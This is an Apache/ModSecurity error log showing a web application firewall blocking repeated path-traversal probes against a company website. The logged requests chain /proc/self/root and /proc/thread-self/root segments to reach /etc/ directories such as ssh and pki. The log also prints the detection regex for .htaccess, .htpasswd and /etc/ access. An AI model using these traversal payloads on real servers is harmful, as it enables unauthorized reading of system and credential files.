[Thu Mar 19 10:38:56.407760 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.243.128:60428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8cF_V7PWP6ixUYl66tgAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:39:04.117910 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54276] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:39:05.361709 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.228.61:54290] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv8eda6ubjKNq_cu4ZQuQAAA0w"]
[Thu Mar 19 10:39:14.999624 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:40560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8ggkwaGbbGflqUZC-mAAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:39:25.137780 2026] [proxy_fcgi:error] [pid 19093:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54806] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:39:34.864598 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:33936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8luyqAr6etmhZHNpfVgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:39:39.557637 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:55694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8m8df6f5d65gmYZR1NAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:39:43.936885 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.243.128:55706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8n1_V7PWP6ixUYl66ygAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:39:47.034083 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55408] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:39:49.091046 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:55712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8pcdf6f5d65gmYZR1OAAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:39:53.331185 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:34374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8qfu8EFLIOrSqIpujyQAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:00.391473 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:34386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8sOoXxyEfFpUF8f8M4AAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:09.129796 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55900] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:40:16.119542 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:41652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8wOyqAr6etmhZHNpfZgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:20.466987 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:60654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8xNa6ubjKNq_cu4ZQ9gAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:24.147073 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.243.128:60662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8yBkFeYa1D6dYQnDupgAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:26.998067 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:60670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8ygkwaGbbGflqUZC-wAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:30.079503 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:51246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv8zta6ubjKNq_cu4ZQ_wAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:32.137838 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56472] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:40:33.050305 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:51256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv80eyqAr6etmhZHNpfagAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:41.708859 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.243.128:51262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv82V_V7PWP6ixUYl666gAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:43.050505 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:51750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv82_u8EFLIOrSqIpuj5gAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:40:44.427426 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:51758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv83AkwaGbbGflqUZC-1wAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:48.113087 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:51774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv84Pu8EFLIOrSqIpuj6AAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:40:52.729164 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:44760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv85AbLMZ6AikZjR9Vb5AAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:40:54.057882 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57066] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:40:54.442804 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:44766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv85sdf6f5d65gmYZR1UwAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:40:54.560893 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.244.43:45230] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv85l_V7PWP6ixUYl667gAAAoI"]
[Thu Mar 19 10:40:57.350158 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:44776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv86eyqAr6etmhZHNpfcQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:41:15.693784 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57602] AH01075: Error dispatching request to : (polling)
